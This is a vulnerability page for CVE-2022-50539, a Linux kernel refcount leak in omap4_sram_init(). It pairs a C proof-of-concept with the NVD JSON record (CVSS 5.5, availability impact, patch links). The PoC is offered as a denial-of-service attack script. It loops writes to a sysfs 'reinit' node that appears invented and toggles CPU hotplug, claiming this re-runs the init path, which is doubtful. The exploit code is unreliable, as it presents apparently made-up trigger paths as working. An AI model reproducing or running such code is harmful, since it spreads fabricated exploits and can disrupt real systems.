CVE-2022-50539

/* * CVE-2022-50539 PoC - Trigger refcount leak in omap4_sram_init() * This PoC demonstrates how to trigger the refcount leak vulnerability * by repeatedly invoking the SRAM initialization path on OMAP4 platforms. * * Note: This requires a system running on OMAP4 hardware with the vulnerable kernel. * Compile with: gcc -o poc poc.c * Run as root or with appropriate privileges. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <errno.h> /* Trigger SRAM re-initialization via sysfs or direct kernel module interaction */ #define OMAP4_SRAM_SYSFS_PATH "/sys/devices/platform/omap4_sram" #define TRIGGER_ITERATIONS 10000 int main(int argc, char *argv[]) { int i; int ret; printf("[+] CVE-2022-50539 Refcount Leak PoC\n"); printf("[+] Target: Linux Kernel ARM OMAP2+ omap4-common\n"); printf("[+] Iterating to trigger refcount leak...\n"); for (i = 0; i < TRIGGER_ITERATIONS; i++) { /* Attempt to trigger omap4_sram_init() path repeatedly */ /* Method 1: Write to sysfs to trigger re-initialization */ int fd = open(OMAP4_SRAM_SYSFS_PATH "/reinit", O_WRONLY); if (fd >= 0) { ret = write(fd, "1", 1); close(fd); } /* Method 2: Attempt CPU hotplug to trigger subsystem re-init */ int cpu_fd = open("/sys/devices/system/cpu/cpu1/online", O_WRONLY); if (cpu_fd >= 0) { /* Toggle CPU online state to trigger re-initialization */ if (i % 2 == 0) { write(cpu_fd, "0", 1); } else { write(cpu_fd, "1", 1); } close(cpu_fd); } if (i % 1000 == 0) { printf("[+] Iteration %d/%d completed\n", i, TRIGGER_ITERATIONS); } } printf("[+] PoC execution completed. Check kernel memory usage.\n"); printf("[+] If vulnerable, kernel memory will show increased usage.\n"); return 0; }

{"cve": {"id": "CVE-2022-50539", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.200", "lastModified": "2026-02-26T23:16:47.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nARM: OMAP2+: omap4-common: Fix refcount leak bug\n\nIn omap4_sram_init(), of_find_compatible_node() will return a node\npointer with refcount incremented. We should use of_node_put() when\nit is not used anymore."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.18", "versionEndExcluding": "6.1.16", "matchCriteriaId": "D11689C2-9FF1-4BD8-90EC-F807DBC3C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/049875b76660bbdc4873a915afb294f954eb7320", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1d9452ae3bdb830f9309cf10a2f65977999cb14e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7c32919a378782c95c72bc028b5c30dfe8c11f82", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}